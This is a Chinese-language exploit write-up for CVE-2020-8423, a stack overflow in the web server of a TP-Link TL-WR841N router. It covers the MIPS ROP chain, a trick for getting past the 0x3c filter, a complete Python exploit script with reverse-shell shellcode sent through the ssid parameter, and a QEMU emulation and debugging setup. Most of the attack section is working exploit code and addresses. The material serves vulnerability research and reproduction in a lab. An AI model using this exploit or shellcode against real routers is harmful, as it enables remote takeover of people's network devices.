CVE-2020-8423后篇

此为后篇，主要是ROP和环境配置。

ROP Chain

该程序没有任何保护，且拥有RWX段，我们通过构造ROP即可劫持控制流

在mips中包含一种cache incoherency的问题，指令cache和数据cache需要一个时间来同步。具体的东西在后续文章中再研究。

最简单可靠的让缓存数据写入内存的方式是调用一个堵塞函数。比如sleep(1)或者其他类似的函数。sleep的过程中，处理器会切换上下文让给其他正在执行的程序，缓存会自动执行flush。

手工制作

在这里，我们可以使用 s3 中的值（在这里等于 5）设置调用参数

move $t9, $s1 ;
jalr $t9 ;
move $a0, $s3

这相当于 a0=5 和 jmp ​s1（我们能控制 ​s1）。

注意：MIPS 的另一个特殊性是分支延迟槽，当执行涉及跳转的指令时，在到达目的地之前也执行后面的指令。这解释了为什么在我们的小工具中跳转后还包含一条指令。

由于函数调用将使用 ra 中的值返回，我们需要找到一个gadget来设置该寄存器并通过另一个寄存器跳转。这个不难找，很多函数结尾都是类似下面这样的：

move $t9, $s2 ; 
lw $ra, 0x24($sp) ; 
lw $s2, 0x20($sp) ; 
lw $s1, 0x1c($sp) ; 
lw $s0, 0x18($sp) ; 
jr $t9 ; 
addiu $sp, $sp, 0x28

相当于 ra=0x24(sp), sp+=0x28, jmp $s2.

由于堆栈是可执行的，我可以跳到堆栈中执行一些东西；这个gadget在v0中加载带有偏移量的堆栈地址，并跳转到s0值所指向的位置

addiu $v0, $sp, 0x40 ; 
ori $a1, $zero, 0x8912 ; 
addiu $a2, $sp, 0x18 ; 
move $t9, $s0 ; 
jalr $t9 ; 
sw $v0, 0x1c($sp)

最后，我们可以使用所有gadget中最简单的一个跳到v0

jr $v0 ;
nop

接下来只要编写好shellcode就可以

mips 调用 shellcode 构造模板：

https://www.cnblogs.com/hac425/p/9416864.html

https://www.anquanke.com/post/id/179510

通过框架可以构造出shellcode，但是不能直接使用

因为程序会对 ssid 输入内容在 stringModify 进行过滤，导致 shellcode 中的 lui 指令的字节码 0x3c(<) 被替换，所以需要对 shellcode 进行改造。 可以使用指令逃逸的方法，使用一些无关指令，如 ori $t1,$t1,0xff3c，其对应的机器码为\x35\x29\xFF\x3C，会被替换为\x35\x29\xFF\x5c\x3c，这样\x3c就会逃逸到下一个内存空间去，在对shellcode修改时，加入我们要修改的代码为"\x3c\x0e\xc0\xa8" // lui $t6, 0xc0a8，只需在无关指令后填入\x0e\xc0\xa8即可。

使用反弹本地9999端口的shellcode构造好exp后，在宿主机中通过nc连接即可。

import requests
from pwn import *
import urllib
session = requests.Session()
session.verify = False

context.binary = "./squashfs-root/usr/bin/httpd"
context.endian = "big"
context.arch = "mips"

base = 0x775ba000
sleep_addr = base+0x0053ca0
rop1=base+0x00055c60
rop2=base+0x00037470
rop3=base+0x0000e904
rop4=base+0x000374d8

shellcode="\x24\x0e\xff\xfd\x01\xc0\x20\x27\x01\xc0\x28\x27\x28\x06\xff\xff"
shellcode+="\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff\x8f\xa4\xff\xff"
shellcode+="\x34\x0e\xff\xff\x01\xc0\x70\x27\xaf\xae\xff\xf6\xaf\xae\xff\xf4"
shellcode+="\x34\x0f\xd8\xf0\x01\xe0\x78\x27\xaf\xaf\xff\xf2\x34\x0f\xff\xfd"
shellcode+="\x01\xe0\x78\x27\xaf\xaf\xff\xf0\x27\xa5\xff\xf2\x24\x0f\xff\xef"
shellcode+="\x01\xe0\x30\x27\x24\x02\x10\x4a\x01\x01\x01\x0c\x8f\xa4\xff\xff"
shellcode+="\x28\x05\xff\xff\x24\x02\x0f\xdf\x01\x01\x01\x0c\x2c\x05\xff\xff"
shellcode+="\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x0e\xff\xfd\x01\xc0\x28\x27"
shellcode+="\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x0e\x3d\x28\xaf\xae\xff\xe2"
shellcode+="\x24\x0e\x77\xf9\xaf\xae\xff\xe0\x8f\xa4\xff\xe2\x28\x05\xff\xff"
shellcode+="\x28\x06\xff\xff\x24\x02\x0f\xab\x01\x01\x01\x0c"

payload = "/%0A"*0x55 + "aa"
payload += "s0s0"			# s0           
payload += p32(rop2)		# s1
payload += p32(sleep_addr)	# s2
payload += p32(rop1)

payload += b'a'*28  		# padding
payload += p32(rop4)		# s1
payload += b'a'*0x4			# s2
payload += p32(rop3)		# ra
payload += b'a'*0x18		# gadget2最后addiu  $sp, 0x28调整了sp的位置
payload += shellcode

print(len(payload))

def exp(path,cookie):
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36",
        "Cookie":"Authorization=Basic{cookie}".format(cookie=str(cookie))
        }
    params = {
    "mode":"1000",
    "curRegion":"1000",
    "chanWidth":"100",
    "channel":"1000",
    "ssid":urllib.unquote(payload)#urllib.request.unquote(payload)
    }
    url="http://10.10.10.2:80/{path}/userRpm/popupSiteSurveyRpm_AP.htm".format(path=str(path))
    resp = session.get(url,params=params,headers=headers,timeout=10)
    print (resp.text)
exp("ISCUSKDACAGOHTBA","%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D")

【借鉴】socket方法

如果我们分析指令，我们会发现当writePageParamSet()函数被调用时，req是通过寄存器s7传递的；之后，在内部调用stringModify()（导致溢出），并在同一帧调用httpPrintf()。幸运的是，其中一个内部调用会将s7存储在堆栈中。

由于这些gadet都是确定性的，我们可以计算出req和sq的偏移量。当我们控制pc寄存器时，结果是req在sp-0x480+0x204。然后我们就获得了req的socket成员变量的地址(&req + 0x34)。通过它可以得到一个shel.

环境搭建篇

虽然IOT-vulhub提供了很多实用的docker，但是单论调试httpd还是不好用

尝试了很多种方法，光是环境就折腾了好几天

1.真机

一开始想用真机，但是一来真机要等发货，而来往真机上传gdbserver也不容易，最好的情况是用ftp，最坏的情况就得用串口了

(laptop) $ pip3 install --user ptftpd
(laptop) $ ptftpd -p 4444 enp8s0 -v .
(router) # tftp -g -r gdb-server -l /tmp/gdb-server 192.168.0.100 4444

该漏洞挖掘者认为下载固件来模拟是更简单方法

2.漏洞发现人的办法

自主构建内核

$ export ARCH=mips
$ export CROSS_COMPILE=mips-linux-gnu
$ export PATH=/path/to/toolchain/bin/:$PATH
$ make malta_defconfig
$ make menuconfig
  < select BIG ENDIAN >
$ make -j 8
$ make modules_install INSTALL_MOD_PATH=/somewhere/

qemu

$ qemu-system-mips \
    -M malta \
    -kernel linux-2.6.31/vmlinux \
    -hda mips/debian_squeeze_mips_standard.qcow2 \
    -append "root=/dev/hda1 console=ttyS0" \
    -nographic \
    -serial mon:stdio \
    -nic user,hostfwd=tcp::2222-:22,hostfwd=tcp::8080-:80
Linux version 2.6.31 (gipi@turing) (gcc version 4.5.2 (Sourcery CodeBench Lite 2011.03-93) ) #2 SMP Tue Jan 14 12:33:40 CET 2020

LINUX started...
console [early0] enabled
CPU revision is: 00019300 (MIPS 24Kc)
FPU revision is: 00739300
registering PCI controller with io_map_base unset
Determined physical RAM map:
 memory: 00001000 @ 00000000 (reserved)
 memory: 000ef000 @ 00001000 (ROM data)
 memory: 003ec000 @ 000f0000 (reserved)
 memory: 07b23000 @ 004dc000 (usable)
 ...
Starting MTA:Starting OpenBSD Secure Shell server: sshd.
 exim4.

Debian GNU/Linux 6.0 debian-mips ttyS0

debian-mips login: root
Password:
   ...
root@debian-mips:~#

这启动了我们的仿真机，并允许从端口2222连接“ssh”，并在端口8080暴露web接口

$ ssh -p 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@127.0.0.1
Warning: Permanently added '[127.0.0.1]:2222' (RSA) to the list of known hosts.
root@127.0.0.1's password:
   ...
root@TL-WR841N:~#

现在可以复制文件系统，在其中mount proc文件系统并chroot

root@debian-mips:~# mount --bind /proc /tl-rootfs/proc/
root@debian-mips:~# chroot /tl-rootfs/ bin/sh


BusyBox v1.01 (2015.03.10-07:17+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# export LD_PRELOAD=/hook-mips.so
# httpd
read_from_configflash: ioctl failed: Inappropriate ioctl for device
============Firmware version check failed=============
read_from_configflash: ioctl failed: Inappropriate ioctl for device
   ...
HOOK: system( "rm -rf /var/log" ) returned 1137
HOOK: system( "syslogd -C -l 7 &" ) returned 1137
HOOK: system( "klogd &" ) returned 1137
   ...

很明显，开箱即用的httpd是不起作用的，因为一些设备文件不存在，但可以使用LD_PRELOAD机制来欺骗守护进程，特别是我截获了system（）和fork（）调用，以避免发生网络配置。

3.本文办法

本文最后采取的办法是qemu-sytem＋ssh

前置工作

使用 binwalk 解压固件：

环境不能直接使用，必须hook掉httpd文件里面的阻塞函数。

先构建 buildroot 环境，交叉编译得到 hook.so

$ mips-buildroot-linux-uclibc-gcc -shared -fPIC hook.c -o hook.so

需要hook掉fork和system函数

#include<stdio.h>
#include<stdlib.h>
int system(const char *command){
    printf("HOOK: system(\"%s\")",command);
    return 1337;
}

int fork(void){
    return 1337;
}

正式搭建

使用命令打开mis qemu系统模式：

$ sudo apt-get install uml-utilities # 安装tunctl
$ sudo tunctl -t tap0 -u `whoami`  # 为了与 QEMU 虚拟机通信，添加一个虚拟网卡
$ sudo sudo ifconfig tap0 192.168.0.2/24 up # 为添加的虚拟网卡配置 IP 地址
$ sudo qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -netdev tap,id=tapnet,ifname=tap0,script=no -device rtl8139,netdev=tapnet -nographic

开启成功后使用root:root登录
配置网卡IP：

ifconfig eth0 192.168.0.1/24 up

将文件系统复制到qemu虚拟机root目录下，同时把gdbserver和hook.so传进去。

scp -r ./squashfs-root root@192.168.0.1:~/

使用 chroot 切换根目录固件文件系统

# 挂载，确保能够访问到
$ mount -o bind /dev ./squashfs-root/dev/
$ mount -t proc /proc/ ./squashfs-root/proc/ 

# 切换根目录后执行新目录结构下的 sh shell
$ chroot squashfs-root sh 
# 用hook.so把阻塞函数hook掉
$ LD_PRELOAD="/hook.so" /usr/bin/httpd
# 这之后这个终端会不断输出，没法用了

PS:使用 chroot 后，系统读取的是新根下的目录和文件，也就是固件的目录和文件 chroot 默认不会切换 /dev 和 /proc, 因此切换根目录前需要现挂载这两个目录，这样我们的程序在访问一些内核信息时候能够读取到。

# 连上虚拟机，开启调试
(laptop)$ ssh -D 2345 192.168.0.1
(TL-WR841N)$ pstree -p

(TL-WR841N)$ ./gdbserver 0.0.0.0:1234 --attach 2373
(laptop)$ gdb-multiarch /usr/bin/httpd
pwndbg> set architecture mips
pwndbg> target remote 192.168.0.1:1234 #对应qemu地址和端口